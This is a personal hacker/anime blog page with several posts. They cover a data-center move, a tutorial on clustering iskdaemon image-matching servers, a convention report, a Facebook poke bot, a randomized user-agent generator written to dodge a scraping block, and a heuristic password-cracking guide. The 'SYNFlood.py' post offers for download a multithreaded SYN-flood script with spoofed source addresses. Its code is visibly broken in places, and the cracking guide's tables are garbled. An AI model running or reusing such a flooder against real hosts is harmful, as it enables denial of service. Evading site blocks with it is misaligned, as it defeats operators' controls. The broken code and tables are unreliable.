A Blog About Anime, Code, and Pr0 H4x

From the Baseement to the Data Center

September 17, 2014 at 06:13 AM

Studio Bebop has been growing a lot over the last year. We're now incorporated, and last week moved all of our server equipment into our very own (colocation) data center!

Before I get into the big data center move, I first have to rewind back to early 2013 and my first foray into hosting my own servers. At the time I was developing a price comparison website (like Expedia or Kayak) for PVC figures from anime and video games, called Figure Stalk (which is still under development FYI).

The core component of what makes Figure Stalk run is an image matching engine that compares images of potential product matches on other vendor websites with the images on a source product page you'd feed into the website. (If you'd like to know more about the image matching engine stuff, you should take a peek at this blog post I wrote about it.) The only problem is that the image matching engine requires a fairly large amount of RAM to play with in order to be fast enough to be more than a proof of concept, and at the time all of Studio Bebop's hosting needs were being facilitated with VPS servers from Linode, who while great for what they do, weren't really equipped to meet our needs for this project (at least without costing me an arm and a leg).

So after crunching the numbers, I decided to throw caution to the wind and bought the components for a manly man server with RAM for days. Two weeks, a couple orders for missing components, and a loving kernel configuration later, Bebop3 was born! In the interest of brevity I won't bore you with all the hardware details suffice to say that Bebop3 ended up having 96 GB of RAM, 2x 2.0 Ghz 8 Core CPUs, an SSD for the OS and DB, and a 1 TB WD Red for holding all the static content.

Armed with my new super server, I was then faced with the task of finding a nice fat pipe and a static IP to hook it up to that was both close enough to where I lived in case I needed to perform maintenance, but also far enough away so that my apartment didn't end up looking like an episode of Serial Experiments Lain. At the time I was unaware that colocation was even a thing, so I ended up signing a three year agreement for business class internet with Comcast. The package I was able to get with them was for 1 static IP, 20 Mb/s up, and 50 Mb/s down for $225 a month, and while not ideal, it at least got the job done and was the best option I had available to me at the time.

Or rather I should say, it got the job done until a month or so later when I launched Yugioh Prices, which in turn took off like a rocket and quickly maxed out my measly 20 Mb/s up speed. As time went on and Yugioh Prices continued to grow in popularity, I ended up working around my bandwidth limitations with Comcast by hosting the Yugioh card images that were eating up all of my bandwidth on 4 separate Linodes, and using a round-robin load balancing strategy to split the load over the four. (Because even though Linode had the the bandwidth to serve the images without a problem, they limited me to 4 TB a month of outgoing data per VPS, and on a heavy month we'd push out somewhere between 12 and 13 TB in Yugioh card images at least.)

This set up would have been ideal if Yugioh Prices and Figure Stalk were the only things that Bebop3 was hosting, but after about a year the machine had become the primary back-end workhorse for Studio Bebop and was hosting 18 different websites and support APIs for our various products, and after seeing top stats like these as the norm last month, I knew it was time once again to invest in more server hardware. This investment took the form of Bebop6, a clone of Bebop3, but with much scarier fans.

With Bebop6 in tow, I gave Comcast the boot (well more like just unplugged everything and agreed to keep paying them because they've got me locked in a contract for another 18 months :/), and signed up with Fibernet here in Orem. I cannot understate how impressed with Fibernet I am, and how excited I am to have my servers housed in their data center, after hacking around with trying to do it myself with a mobile rackmount tank at my aunt and uncle's house in Spanish Fork, it is a huge relief to finally be in a real data center!

I've signed up for Fibernet's full cabinet bundle, which gets me:

  • 48 U of rack space to work with
  • 100 Mb/s in bandwidth up and down (synchronous, and unlimited)
  • 4 Static IPs
  • And a cold basement room to stash my servers in that has enough locks and finger print readers to give even Michael Weston from Burn Notice a hard time.

Phew, well that's enough background on why I ended up moving my server hardware into a data center, so how about some pictures already!

Oh, and just in case you're wondering why the left fan on Bebop3 isn't spinning, it's because I accidentally got a little too close to it while it was running, and it ended up sucking one of the cuff buttons right off of my jacket, which it then proceeded to snap two of its blades off on. Now that's the kind of excessive cooling power every server should have, grunt grunt.

imgSeek - Overcoming Performance Bottlenecks by Clustering Iskdaemon Instances

March 13, 2013 at 12:00 PM

imgSeek (and it's server-side variant iskdaemon) is an open source image matching engine developed by Ricardo Cabral. In a nutshell, imgSeek makes it possible (with just a little bit of hacking) to perform reverse image searches and visual similarity comparisons against a specific group of images of your choice, just like Google Images or TinEye (but without the beefy monthly fees). For more information, take a look at the official imgSeek documentation.

For those of you who may not see the value in being able to do reverse image searches and visual similarity comparisons on an arbitrary set of images, allow me to elaborate with a real-world example of how I use imgSeek.

Ever since mid-November I've been using imgSeek to handle all of the server-side logic behind the "identify a card by taking a picture of it" feature of my iOS app Duel Master: Yu-Gi-Oh Edition. With this feature all a user has to do is take a picture of a Yu-Gi-Oh card, and within seconds all of the relevant information about that particular card (details, rulings, prices, etc) will be presented to them. This is all accomplished by uploading the picture they took to one of the Studio Bebop API servers, feeding it through imgSeek, and then returning the results to the app for additional processing and presentation. You can see a demonstration of this feature in action in the promo video below.

As you can see, imgSeek definitely works, and it works pretty well too. However don't let my super awesome app promo fool you, there are some serious drawbacks and kinks to using imgSeek. Despite the fact that imgSeek is technically stable enough to be deployed for real-world projects, the truth is that it is still in-development software, and as such suffers from bugs, hiccups, and scary segmentation faults.

Moreover, imgSeek doesn't scale very well, especially when it comes to handling lots of requests at once. While there is some vague mention of a "clustered mode" within the default iskdaemon configuration file, it isn't actually an implemented feature yet. As such, if you hit a stock copy of iskdaemon with lots of requests at a time, you're going to start to see some serious lag due to the fact that at the moment a stock copy of iskdaemon can only process one request at a time. So if it takes roughly one second for your copy of iskdaemon to perform a visual similarity comparison, and you've got twenty or thirty requests in the queue, you can expect some serious latency. (Which will only grow worse as you add more images to your database.)

Luckily for all of you, I've taken it upon myself to implement fixes for all of theses gripes (and a few more I didn't bother mentioning), and put them into a special branch of iskdaemon called iskdaemon-clustered!

Clustered Access Layout

The basic theory behind clustering instances of iskdaemon is pretty straightforward. First you launch multiple instances of iskdaemon, each listening on a different port, but all sharing the same image database file. Then, you use Nginx (or whatever HTTP daemon floats your boat), to handle the actual load balancing via a round robin style proxy pass. Simple right? WRONG! Well sort of...

The above layout will work fine as long as you're just performing read requests (queryImgID, queryImgBlob, queryImgPath), but once you start doing write requests (addImgBlob, addImg) through the load balancing proxy pass, that's when things start to break. To put it simply, your instance nodes will start to develop database inconsistencies with each other. By which I mean that some nodes will have an image, while others some won't. Moreover once you start trying to save/load to the same database file things get even worse, because that's when you'll start to see endless loops of database errors and/or crashes.

To overcome this shortcoming, I decided to tweak things so that there is a separate instance of iskdaemon running outside of the proxy pass group, that is specifically dedicated to performing write requests. Then with the addition of some fancy h4x, I made it so that the reader iskdaemon instances in the proxy pass group automatically update their local copies of the image database so that they are always up to date.

Implementing the separate writer instance was pretty straight forward, but the logic behind keeping all of the reader instances up to date is a bit more complicated. In this next section I'll be going over in detail how I do that. You don't have to read the next section to compile/install iskdaemon-clustered, but you probably should. If you don't feel like it, skip ahead to Installing iskdaemon-clustered On Your Server.

Overcoming Database Inconsistencies With Multiple Iskdaemon Instances

Clustered access layout with separate writer instance.

The reason that parallel iskdaemon instances can develop database inconsistencies in the first place lies in the fact that iskdaemon reads and writes its image data to a single database file that is only read into memory when the iskdaemon process first starts. Any image data you add via addImgBlob or addImg is held only in memory until you call saveDb.

So when you add an image to your images database using one of your parallel instances of iskdaemon, the other instances won't know about it until they reread the database file, which normally only happens when you start iskdaemon. To overcome this hurdle I've modified queryImgBlob and queryImgID so that they call a special function that checks to see if the images database has been modified since the last time there was a read request, and rereads it into memory if there have been any changes, before doing any actual image matching work.

Unfortunately rereading the database file into memory is trickier than you might think. If for instance you try to reread the database file while your writer process is in the middle of saving its new changes, you'll more than likely run into a fat load of read errors that could potentially send your reader instances into an infinite loop of database errors. To work around this issue, I implemented another special function that copies the main images database file into a temporary file, which is read, and then deleted. If the read fails for some reason, the function recurses into itself until it successfully rereads the image database file. I'll be the first to admit that it's not the most elegant of solutions, but it's simple, and it works.

Below is a flow chart that outlines the process iskdaemon-clustered uses to handle read requests without running into database inconsistencies.

Installing iskdaemon-clustered On Your Server

Please note that the following instructions are for compiling/installing on a *nix system. You're on your own Windows users.

First up, make sure you have all of the necessary prerequisites. (If you are using Gentoo, you should be able to emerge all of this stuff without any problems.)

  • git
  • nginx
  • python version >= 2.5 (but not 3.0 yuck!) and python development libraries
  • python twisted matrix libs 8.x or later
  • python SOAPpy package 0.12
  • C/C++ compilers
  • libmagick
  • libmagick++
  • SWIG

Next, clone the iskdaemon-clustered Github repository.

git clone https://github.com/StudioBebop/iskdaemon-clustered.git

Now compile iskdaemon-clustered!

$ cd iskdaemon-clustered
          $ cd src
          $ python setup.py build
          $ sudo python setup.py install

Now assuming that you have all of the necessary prerequisites, and nothing went wrong, iskdaemon-clustered should now be installed on your system. If you are having problems compiling, try taking a look at the installation instructions on the imgSeek website.

Now for the fun part, configuring your iskdaemon cluster! As I explained earlier, the basic concept here is to launch multiple instances of iskdaemon.py in parallel that all share the same database file. To make this easier for you, I've included a python script (launch-clustered-isk.py) that makes this super easy (again it's a little hacky, but it gets the job done without too much work).

First copy launch-clustered-isk.py to wherever you'd like to hold the database and other files for your iskdaemon cluster. (I just use my home directory.)

cp iskdaemon-clustered/launch-clustered-isk.py ~

launch-clustered-isk.py should work right out of the box, but for the sake of learning, let's take a quick peak at it's configuration options.

Open launch-clustered-isk.py up in your favorite text editor (Nano master race reporting in). Lines 19-23 are the places where you can make adjustments where you need/want to, each line is commented, but I'll give you a quick overview anyway.

  • instance_count = 13
    This sets how many instances of iskdaemon.py you'd like to launch. With the default configuration 13 instances will be launched. 1 for writing, and 12 for reading.
  • start_port = 1336
    This sets the port to start your instances listening on. With each instance the listening port will be incremented by 1.
    • Instance 1 - listens on port 1336
    • Instance 2 - listens on port 1337
    • Instance 3 - listens on port 1338
  • execpath = "/usr/bin/iskdaemon.py"
    This sets the path to iskdaemon.py. The default value _should
    work, but you will need to adjust it if you ended up installing isdkaemon.py somewhere else.
  • isk_root = os.path.join(os.path.abspath("."), "isk-cluster")
    This sets the path that will be created to hold all of the iskdaemon cluster files. You should probably leave this line alone.
  • iskdbpath = os.path.join(os.path.abspath("."), "isk-db")
    This sets the path to the main iskdaemon image database file. You should probably leave this line alone.

Once you have launch-clustered-isk.py configured just the way you want it, it's time to configure Nginx to handle proxying requests to your cluster.

Open up Nginx's config file (should be /etc/nginx/nginx.conf on Gentoo) in your favorite text editor, and in the http{} section, add the following lines.

http {
              upstream isk-cluster {
                  server localhost:1337;
                  server localhost:1338;
                  server localhost:1339;
                  # ... skipping some lines, and assuming you configured 12 reader instances
                  server localhost:1346;
                  server localhost:1347;
                  server localhost:1348;
              # listen on localhost on port 81
              server {
                  listen 81;
                  server_name localhost;
                  location / {
                          proxy_pass http://isk-cluster;

Now (re)start Nginx, and then run launch-clustered-isk.py. If everything went right, you should see a bunch of lines about launching iskdaemon instances and listening on different ports. If you see error messages, something has gone terribly terribly wrong, and it's up to you to figure out what.

Assuming everything went as planned, you should now be able to access your iskdaemon read cluster from http://localost:81, and your writing instance via http://localhost:1336. Have fun!

Miscellaneous Tips and Information

  • launch-clustered-isk.py isn't a daemon process. If you want to launch and forget it, do what I do, and launch it in a screen.

    $ screen $ ./launch-clustered-isk.py &
  • launch-clustered-isk.py uses infinite loops to keep your various iskdaemon instances running, even if they crash. If you want to shut down your iskdaemon cluster, execute the following commands.

    $ killall launch-clustered-isk.py $ killall iskdaemon.py
  • I've modified the queryImgBlob and addImgBlob functions a little bit. To use them, send them base64 encoded image data. I did this so that I could use these functions with Ruby's default XMLRPC library.
  • An additional way you can give your iskdaemon instances a boost is by renicing them. To renice your entire iskdaemon cluster, execute the following command.

    $ echo renice -n -10 -p `echo \`pgrep iskdaemon.py\` | sed -e 's/ / /g'` | sudo /bin/bash
  • Iskdaemon and iskdaemon-clustered are resource monsters. Make sure you have the hardware resources necessary to run things smoothly. You don't want to be dipping heavily into swap space because you ran out of RAM.
    • I'm running my iskdaemon cluster on a server with 64gb of RAM and an SSD for the database files.
  • I use iskdaemon-clustered in the following projects.

  • If you have an idea to improve iskdaemon-clustered, or are using it in a project, let me know!

SYNFlood.py - A multithreaded SYN Flooder

January 18, 2013 at 12:00 PM

I wrote this script a long time ago when I was just starting to learn about networking basics. During that time, I came across a Python library that makes it easy to craft and manipulate network traffic at a packet level by the name of Scapy.

I wrote this script as a demonstration of a SYN/ACK Three Way Handshake Attack as discussed by Halla of Information Leak in an article that has since mysteriously disappeared from his site. I also mentioned this script in an article I wrote about hacking gibsons or something to that effect, that I have since removed form this site because the writing in it was atrocious. (Well it was written by a ninth grader, so that's not a huge surprise.)

Anyway, aside from searches for the phrase "How can you say you love her if you can't even eat her poop?" (oh yeah, I'm an SEO master), the majority of external search engine hits to my website come from people looking for this script. Therefore, I decided I'd spruce it up a touch, and repost it in all of its glory here.

So without further adieu, gaze and behold!

#!/usr/bin/env python
          # SYNflood.py - A multithreaded SYN Flooder
          # By Brandon Smith
          # brandon.smith@studiobebop.net
          # This script is a demonstration of a SYN/ACK 3 Way Handshake Attack
          # as discussed by Halla of Information Leak
          import socket
          import random
          import sys
          import threading
          #import scapy # Uncomment this if you're planning to use Scapy
          # Global Config
          interface    = None
          target       = None
          port         = None
          thread_limit = 200
          total        = 0
          #!# End Global Config #!#
          class sendSYN(threading.Thread):
                  global target, port
                  def __init__(self):
                  def run(self):
                          # There are two different ways you can go about pulling this off.
                          # You can either:
                          #   - 1. Just open a socket to your target on any old port
                          #   - 2. Or you can be a cool kid and use scapy to make it look cool, and overcomplicated!
                          # (Uncomment whichever method you'd like to use)
                          # Method 1 -
          #               s = socket.socket()
          #               s.connect((target,port))
                          # Methods 2 -
          #               i = scapy.IP()
          #               i.src = "%i.%i.%i.%i" % (random.randint(1,254),random.randint(1,254),random.randint(1,254),random.randint(1,254))
          #               i.dst = target
          #               t = scapy.TCP()
          #               t.sport = random.randint(1,65535)
          #               t.dport = port
          #               t.flags = 'S'
          #               scapy.send(i/t, verbose=0)
          if __name__ == "__main__":
                  # Make sure we have all the arguments we need
                  if len(sys.argv) != 4:
                          print "Usage: %s <Interface> <Target IP> <Port>" % sys.argv[0]
                  # Prepare our variables
                  interface        = sys.argv[1]
                  target           = sys.argv[2]
                  port             = int(sys.argv[3])
          #       scapy.conf.iface = interface # Uncomment this if you're going to use Scapy
                  # Hop to it!
                  print "Flooding %s:%i with SYN packets." % (target, port)
                  while True:
                          if threading.activeCount() < thread_limit:
                                  total += 1
                                  sys.stdout.write("\rTotal packets sent:\t\t\t%i" % total)

Download: SYNFlood.py

A First World Problem Is Still A Problem

January 3, 2013 at 12:00 PM

I went to Ikkicon last weekend with my younger brother and a few of my friends, and it was a lot more fun than it was last year. I spent a lot of money, I learned a great many things, and had a wonderful time.

Here are the highlights.

If you're going to buy one thing, you might as well buy six!

Some of you may be familiar with "The Slippery Slope", i.e. the practice of buying figures and other such merchandise from various anime, manga, and video games. Well I've been riding down that particular incline for a few years now, and as I get older and make more money, my collection only grows more and more powerful.

Anyway, I thought that I had bought a lot of figures this year at San-Japan, but my haul from Ikkicon this year (pictured on the right) blew that collection out of the water! Here's a quick break down of what I bought.

Now while this haul from Ikkicon is pretty darn awesome, though it would have been better if I could have found an Elsie figure, I'm faced with a serious problem. I don't have anywhere to put these new figures! My current shelf situation has just about reached critical mass, but I have a plan!

When I get back to my apartment on Friday, I'm going to bust out some serious feng shui on my room. What I want to do is get two or three of these DETOLF glass display cabinets from IKEA, and then rig up some cool LED lighting in them as outlined by this article. I've seen examples of other people's collections who have taken this approach, and it looks pretty awesome. I've got the skills and cash necessary to execute a project like this, now I just need to figure out how to fit it all in to my room, and still be able to sleep.

That boy aint right.

This one came way out of nowhere. The guy who played the voice of John Redcorn from King of the Hill was at Ikkicon. He was signing autographs, and selling John Redcornchips. I bought a bag, and got him to say a few lines from the show. It was a cool experience, but it's also such an odd thing to see at an anime convention, that you just gotta laugh.

The Game Room

One thing that has always been way hit or miss for me at cons, is the game room. This year Ikkicon's game room was pretty meh. They had a few consoles and you could pick a few games to play which was nice, but the TVs were way too small, and Melee was straight up banned. There was a little Rock Band station set up, but that's kinda hard to get into when you can barely hear the music. There was also a rigged up Stepmania (DDR for PC) game, and that was it.

I wish Ikkicon would do what they did a few years ago, and have 20 or so PCs setup on a LAN, and just have everyone play Unreal Tournament and Call of Duty. That was waaaaaay more fun. It wasn't that the game room was terrible or anything, it just wasn't very good.

If I were in charge of setting up the ideal game room for a con, here's what I'd have.

  • Consoles on something bigger than fifteen inch displays.
  • One or two DDR or Stepmania machines.
  • A Street Fighter arcade cabinet.
  • 16 - 20 PCs with Unreal Tournament, Call of Duty, and/or some other fast paced multiplayer games. (Tribes :D)
  • A Dance Maniax machine.
  • Melee tournament on Friday.
  • Brawl tournament on Saturday.
  • DDR tournament on Saturday night.

Dubs in my VN? It's more likely than you think.

We went to a panel on Saturday about dubbing visual novels. This was a subject that had us scratching our heads, as we had never heard of anything like this before. Well apparently it's a thing, albeit a pretty small one. The panel itself was more focused on how to not suck at being a professional voice over talent, and was very interesting.

I'm pretty sure the panel was being ran by the people from Sake Visual, and we were able to learn all about non-Japanese visual novels, and about the English VN dubbing scene. I ended up buying some stuff from them later that day after the panel (pictured left).

The game at the top in the picture is Koenchu, and it's the only one that I've played so far. I started out playing it with the English dub on, but I didn't like it. To be fair, it's a game about being in a school for becoming a voice actor in Japan, so it would be pretty hard to make a dub that would be able to really capture the essence of moe moe Japanese seiyuu.

The bottom two games are a series of detective games that was developed here in the US by Sake Visual. I'm excited to play these two. They were described to me as being kind of like Phoenix Wright mixed with Higurashi, which sounds like a pretty sweet combo. From what I've seen from the art shown off by the about page on the Sake Visual website, the art looks like it'll be pretty good. I just hope that the dub is decent too.

Nerdcore Comedy

Ikkicon had a nerdcore comedy show this year, and it was pretty good. We were late and missed the first act, but the second guy was pretty good, and he totally made fun of these super saiyan level loud dudes that were sitting right behind us. The final act was Alex "KOOLAID" Ansel, and he was great. My brother and I saw him at San-Japan earlier this year, and he was even better this time at Ikkicon. He performed for a long time, told some jokes I hadn't heard from him before, and was all around awesome. I even picked up a copy of his bootleg.

The End.

Pokebot (poh-kay-bot) - A Facebook Poke Autoresponse Bot

January 3, 2013 at 12:00 PM

== Source code available on my Github. ==

A friend of mine asked me to write him a bot that would automatically poke back anyone who poked him on Facebook, so that's what I did.

This bot doesn't make use of any of the actual Facebook APIs, but instead performs all of its actions by mimicking the behavior of an actual web browser. I designed it this way for three reasons.

  1. I was bored and enjoy a challenge.
  2. It takes me back to my days as a freelance spam bot developer.
  3. Working with official APIs can be messy when you have to deal with getting access tokens, and the possibility of having your access revoked if your actions are deemed excessive. So while it's not nearly as straight forward as working with the official API, mimicking a web browser does have its perks.



Assuming you meet all the requirements listed above, all you need to do is run main.py Pokebot will ask for your Facebook email and password, as well as an amount of time to wait between checking for pokes. Once all of that information is squared away, Pokebot will run on a continuous loop until you tell it to stop.

== Source code available on my Github. ==

ZDNet Did An Article on My Article, or Holy Crap I'm Famous!

October 24, 2012 at 12:00 PM

Granted I'm slowpoking super hard on this, but holy crap!

There is an article over on ZDNet about heuristic password cracking that is pretty much based entirely on my article "Building the Better Brute Force Algorithm", which was published in 2600: The Hacker Quarterly last July!

Not only that, but it uses direct quotes from my article, as well as paraphrasing, and even mentions my name!

That's so awesome!

Check it out!

Randomized User Agent Header Generator

October 24, 2012 at 12:00 PM

I put together a scraping bot for a website I frequent occasionally, but they got wise to my Python shenanigans after I released the source code (who'd have thought?), so I had to step up my bot code a bit.

After some tinkering I found that they had just blacklisted the user agent header I was using for the script, instead of doing something more effective like setting access timers between page requests, or getting strict on referer headers, or just banning my account.

But I digress...

Since all they did was ban the user agent string I was using before, all I had to do was change it , and I was back in business. But in the long run this isn't really the best solution since they could always just ban the user agent header again. So instead I decided to throw together a quick Python function that generates a randomized, realish looking user agent header.

Gaze and behold!

def get_random_useragent():
              base_agent = "Mozilla/%.1f (Windows; U; Windows NT 5.1; en-US; rv:%.1f.%.1f) Gecko/%d0%d Firefox/%.1f.%.1f"
              return base_agent % ((random.random() + 5),
                               (random.random() + random.randint(1, 8)), random.random(),
                               random.randint(2000, 2100), random.randint(92215, 99999),
                               (random.random() + random.randint(3, 9)), random.random())
          >>> print get_random_useragent()
          Mozilla/5.2 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/2009098692 Firefox/
          >>> print get_random_useragent()
          Mozilla/5.5 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/2006095233 Firefox/
          >>> print get_random_useragent()
          Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/2064093484 Firefox/
          >>> print get_random_useragent()
          Mozilla/5.6 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/2063099117 Firefox/

I hope someone out there besides me can find a use for this.

Download: random_useragent.py

Building the Better Brute Force Algorithm - A Guide to Heuristic Password Cracking

July 23, 2012 at 12:00 PM

As seen in the Summer 2012 edition of 2600: The Hacker Quarterly.

Let's begin with a brief overview of standard (non-decryption based) password cracking methods. When faced with the task of cracking a password hash, and reverse engineering the encryption algorithm used to create the hash of the original password isn't a viable choice, you are left with a couple of different options.

Dictionary Attacks

A dictionary attack is carried out by iterating through a list of words, creating a hash of each one, and comparing the result to your target hash until you find a match. While dictionary based cracking methods can be used to crack a lot of common passwords, they're not all that effective when things start to become more complicated.

Often people use one or more words in their password, and those words may or may not be separated by a space or contain numbers or punctuation. Take for example, the password "falconpunch". It contains the two words "falcon" and "punch". Both of these words are found in a standard list of dictionary words, but you wouldn't be able to crack this password using a dictionary attack, because they're mashed together to form a single 'word'.

We also run into the same issue with passwords that are made up of, or include, portmanteaus that are not generally found in dictionary lists. Take for instance the portmanteau made from combining the words "char" and "lizard". Chances are pretty good that your dictionary list doesn't include the word "charizard", thus rendering a dictionary attack not very effective for that password.

Brute Force Attacks

When dictionary attacks just won't do, you can always try cracking the password using the brute force method. A brute force attack is carried out by cycling through every possible combination of a sequence of characters (aaaa, aaab, aaac, etc), and hashing each one until you find the sequence whose hash matches your target hash.

The benefit of using a brute force attack, is that it has a 100% chance of success to crack your password hash. The downside though is that to iterate through every possible combination of a sequence of characters until you find a match for your target hash could end up taking a very long time, and it only gets worse the longer and more complicated your target password is.

Take for example the password "charizard rules". That's a password that is 15 characters long, and only contains letters and spaces. Simple right? Well in order to crack this password using a brute force attack, you would need to iterate through every possible combination of the letters a-z and the space (" ") character from a length of one to at least fifteen characters. Let's do some math to see just how many combinations (in theory) we would have to try.


Total Combinations

1 (27^1)


2 (27^2)


3 (27^3)


4 (27^4)


5 (27^5)


6 (27^6)


7 (27^7)


8 (27^8)


9 (27^9)


10 (27^10)


11 (27^11)


12 (27^12)


13 (27^13)


14 (27^14)


15 (27^15)


That's a total of 3,067,940,118,341,250,379,359 combinations.
At a rate of testing 50 hashes per second, it would take about 1,945,674,859,424 years to try every possible combination. That's almost two trillion years!

Now I'm not sure about you, but waiting a couple trillion years to crack someone's password sucks. So let's try cutting down that brute forcing time, by operating under the assumption that our target password has to be at least seven characters long. That means that we only need to calculate the combinations of the letters a-z and the space (" ") from a length of seven characters to at least fifteen characters. Let's see how our math looks now.


Total Combinations

7 (27^7)


8 (27^8)


9 (27^9)


10 (27^10)


11 (27^11)


12 (27^12)


13 (27^13)


14 (27^14)


15 (27^15)


That's a total of 3,067,940,118,340,848,058,083 combinations.
At a rate of testing 50 hashes per second, it would only take about 465,101,560,021 years to try every possible combination. Hooray, that's only 465 billion years which is a lot less time compared to two trillion years!


From the information above we've learned that dictionary attacks are nice, but aren't much help when trying to crack a password more complicated than something your grandma might come up with. (Aka. passwords consisting of more than just a single word or that include non-standard portmanteaus.) We've also learned that using a brute force attack will (eventually) crack any target password with a 100% rate of success, but it'll probably take a few eons to crack longer, more complicated passwords.

So what's a devilishly good looking super hacker to do? Why the answer is obvious. You need to use a smarter brute forcing algorithm!

Before We Continue

You may have noticed that I've conveniently forgotten to mention anything about passwords that include numbers or funky punctuation ($, &, @, etc). It's not that I don't acknowledge the existence of passwords like these, it's just that at this point we're only going to focus on passwords that use the letters a-z, spaces (" "), hyphens and underscores (- _), and common grammatical punctuation (. , ' ? !). I'll address all those kooky complicated passwords later on.

The Psychology of Password Creation

The primary issue with using a brute force attack to crack most real world passwords, is that they spend a ton of time comparing hashes generated from phrases like,

  • aaaaaaaaa
  • aaacccaad
  • xcv hjj abu
  • hhgdfgdrfg

Now these are all spiffy secure passwords, but you'd be hard pressed to find someone who would actually use a password like one of these. Granted there are a select group of paranoid types who I'm sure use passwords like these all the time, but more often than not people tend to pick passwords that they can actually remember; passwords that actually contain words. These words may not necessarily always be separated by spaces, be spelled correctly, or even appear in a dictionary, but they are all still at least words. They are phrases that can be read aloud, and phrases that people say aloud in their minds as they type them in.

Take for instance the words "falcon" and "punch", and all of the different ways they could be arranged to make a password. A few possible combinations would be "falcon punch", "falconpunch", "falcon punch!", "falconpunch!", and "falcon, punch!". Looking at these passwords, no matter how they're put together, the resulting password always includes the words "falcon" and "punch", and when you read it out loud, it's "falcon punch".

So in order to crack a 'regular password' (i.e. passwords that aren't random sequences of nonsense), we need a more heuristic brute forcing algorithm that doesn't waste it's time on unrealistic passwords like "aaaa" and "asdxcv", but instead focuses exclusively on generating passwords made up of words that adhere to the rules of English-like words and phrases.

What is an English-like Word or Phrase?

An English-like word is a word that may not necessarily be an actual English word, but still adheres to a series of rules that our brains use to determine whether or not a given sequence of characters qualifies as a "word". Therefore, an English-like phrase is a grouping of two or more English-like words that adhere to the rules that determine whether or not a group of words qualifies as a valid phrase.

Take for instance this article you're reading right now. As you take in each word, your brain is running a series of tests to make sure that the word you're looking at is actually a word, and not just a bunch of random letters. If I were to drop the word 'kguifdgj' in the middle of a sentence, your brain would automatically flag that word as not being a valid word because it doesn't follow the 'rules' of English-like words. That is, certain rules that every word follows in order to be considered a valid word by our brains. Therefore, you would conclude that that particular sentence was not a valid sentence because it wasn't made up entirely of valid words.

So in order to create a brute forcing algorithm that doesn't waste it's time on nonsense words like "sfdre" and "86ugkie65", we need to 'teach' it how to perform at least some of those same tests that our brain does for us automatically so that it can determine whether a word or phrase is valid or just gibberish. By doing this, we create a brute force algorithm that only generates possible passwords that an everyday person would potentially use. Which in turn drastically reduces the amount of time spent generating extremely unlikely possible passwords.

The Rules of English-like Words


A word cannot include more than one apostrophe. If a word includes an apostrophe, the apostrophe can only be positioned as the last character, or second to last character, in the word. Moreover, an apostrophe's last bordering letter must be an s.


  • chuck's is a valid word
  • chucks' is a valid word
  • chuck'x is not a valid word
  • ch'uks is not a valid word

Hyphens and Underscores

A word cannot include both hyphens and underscores. If a word includes hyphens or underscores, the word should be split at that punctuation, and each word should be tested independently for whether not it is a valid English-like word.


  • snape-kills_dumbledore is not valid
  • lightsabersareawesome should be split at the underscores, and the the individual words should be tested separately to determine whether they are valid or not. If any of the individual words are invalid, then the entire word is invalid as well.

Ending Punctuation (! ? , .)

A word cannot include more than one instance of ending punctuation, and any occurrence of such punctuation can only be positioned as the last character of a word.

Other Punctuation (&, &, @, etc)

A word cannot include any instances of other punctuation.


If a word ends in a known suffix (ing, ist, scope, ology, etc), the last character before the suffix, cannot be the same as the first letter of the suffix.


  • psychology is a valid word
  • psychoology is not a valid word

Note: There are a few words that don't follow this rule, like zoology. However since words like these are the (rare) exception to the rule, it's more effective to just ignore them.


Words must include at least one vowel.

Character Repetition Patterns

The same character can never be repeated more than twice in a row.


  • books is a valid word
  • boooks is not a valid word

The same sequence of characters can never be repeated more than twice in a row.


  • mahimahi is a valid word
  • mahimahimahi is not a valid word

Character Position Analysis

One of the great things about computers is that they're very good at performing simple tasks over and over really fast. Because of this trait, there are certain tests we can have the computer perform to validate words that wouldn't be efficient if you were verifying a word by hand, one such test is Character Position Analysis.

A Character Position Analysis is a test performed by iterating through each character in a word, and analyzing that character's relationship with its neighboring characters in order to determine whether or not certain characters 'fit' next to each other.

To perform a Character Position Analysis, you first need to build a database that documents how often characters appears directly next to, or one character apart from, each other. This database is broken up Into three separate tables that keep track of occurrence patterns for:

  • the first three characters of a word (starters table)
  • the last three characters of a word (enders table)
  • and the characters in a word as a whole (neighbors table).

Below is an example table documenting the overall character occurrence patterns for the word "awesome". Each cell holds two numbers. The first number represents the number of times a character appears directly next to another character, and the second number represents the number of times a character appears one character apart from another character.








0, 0

0, 1

0, 0

0, 0

0, 0

1, 0


0, 1

0, 0

1, 0

0, 1

1, 0

1, 0


0, 0

1, 0

0, 0

1, 0

0, 1

0, 0


0, 0

0, 1

0, 0

0, 0

1, 0

0, 0


0, 0

1, 0

0, 1

1, 0

0, 0

0, 1


1, 0

1, 0

0, 0

0, 0

0, 1

0, 0

From the data in the table above, we can conclude that the letters 'a', 'e', 'm', 'o', and 's' never appear directly after the letter 'a'. We can then use this data to verify whether or not other words are valid. For example the word "amber" would be considered not valid, because the letter 'm' appears directly after the letter 'a' which our occurrence patterns table tells us isn't possible.

Well obviously 'amber' is a valid word (anyone who's seen Jurassic Park knows that), but the data we have in the table above says otherwise. So in order to perform an accurate Character Position Analysis, a very large list of words must be analyzed in order to build a useful set of character position occurrence tables. Such a list of words can be found here, http://www.bsdlover.cn/study/UnixTree/V7/usr/dict/words.html

Once you have a character position occurrence database, then you can perform a Character Position Analysis. A Character Position Analysis is broken up into three separate tests, and a word is only valid if it passes all three tests.

Starting Characters Position Analysis

This test is performed by taking the first three characters of a word, and checking in the starters table whether the occurrence count (aka neighbor score) for the first and second characters, or first and third characters is equal to zero. If either neighbor score is equal to zero, then the word is not valid.

Ending Characters Position Analysis

This test is performed by taking last three characters of a word, and checking in the enders table whether the occurrence count (aka neighbor score) for the third to last and second to last characters, or third to last and last characters is equal to zero. If either neighbor score is equal to zero, then the word is not valid.

General Character Position Analysis

This test is performed by iterating through each character in a word, and checking in the neighbors table whether the occurrence count (aka neighbor score) for each character being tested and the character next to it, and the character one character apart from the character being tested is equal to zero. If any of the neighbor scores is equal to zero, then the word is not valid.

Getting More Accurate Results

One way to get more accurate results when performing a Character Position Analysis, is to raise the minimum required neighbor score from zero, to a higher threshold.

Rules of English-like Phrases


A valid English-like phrase cannot include any occurrence of three or more space characters (" ") in a row. On instances of two spaces in a row, the phrase should be split at the double space, and each sub-phrase should be tested separately. If any of the sub-phrases are not valid, then the entire phrase is not valid.


